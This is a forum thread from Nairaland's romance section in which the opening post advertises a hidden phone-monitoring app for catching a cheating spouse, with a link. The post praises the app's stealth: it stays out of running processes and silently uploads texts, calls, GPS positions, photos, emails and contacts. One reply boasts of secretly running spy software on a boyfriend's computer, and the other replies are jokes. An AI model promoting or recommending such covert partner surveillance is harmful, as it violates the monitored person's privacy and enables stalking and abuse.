Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,148,810 members, 7,802,598 topics. Date: Friday, 19 April 2024 at 05:02 PM

How To Catch A Cheating Wife Or Husband - Romance - Nairaland

Nairaland Forum / Nairaland / General / Romance / How To Catch A Cheating Wife Or Husband (709 Views)

How To Catch A Cheating Girlfirend Using Whatsapp Web. / Sleeping With Your Wife Or Husband Is Like Sleeping With Your Sister Or Brother / 5 Ways To Catch A Typical Nigerian Chic! (2) (3) (4)

(1) (Reply) (Go Down)

How To Catch A Cheating Wife Or Husband by 69orgasmic: 12:39am On Feb 19, 2011
This application is mind blowin,

http://edb8elvan0-aiy7burpjmpv-uv./?tid=PSNGDQW6[color=#990000][/color]

Install the application directly onto the device and it starts every time the phone is turned on. The invisible application remains stealth and doesn't show up in the running processes.

Silently records EVERYTHING including full SMS messages, call info, GPS locations, photos snapped, web sites visited, contacts added and more.

Logs are silently uploaded and stored in your private online account. Your account is accessible only by you from any web browser. Keep reading to learn what specific activities you'll be able to monitor.
Every text message with full text even if the phone's logs are deleted.

Each incoming and outgoing call's number along with duration and time.

GPS postions captured at an adjustable rate with a link to a map.

Every new and active contact in the phone's Contacts list.

All inbound and outbound emails from the primary email account.
Re: How To Catch A Cheating Wife Or Husband by 49cents(m): 1:55am On Feb 19, 2011
divorce rate is bound to soar by 1000%! think its a bad app for these reason. how about apps that can read [[;e's mind it will be chaos
Re: How To Catch A Cheating Wife Or Husband by Nobody: 2:01am On Feb 19, 2011
undecided undecided undecided undecided
hmmmm. the way the world is now,
the concept of marriage is quite comical.
wedding band means absolutely nothing, nor do vows. undecided
Re: How To Catch A Cheating Wife Or Husband by Dsense(m): 2:47am On Feb 19, 2011
***Thinks if to get married or continue this way***

OP.
EHNMM . . . .Okay i heared you!
grin grin
Re: How To Catch A Cheating Wife Or Husband by aminalib(f): 5:31am On Feb 19, 2011
I do have a nanny watch on my computer, it captures EVERYTHING one does, my bf jus thinks i am a witch, he still do this day does not know this program is on the computer grin
Re: How To Catch A Cheating Wife Or Husband by MMM2(m): 6:04am On Feb 19, 2011
am not married

(1) (Reply)

Put A Ring On It. / What About Albinos ? / Greetin Ur Ex-guy Whn Married Is It Good

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 8
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.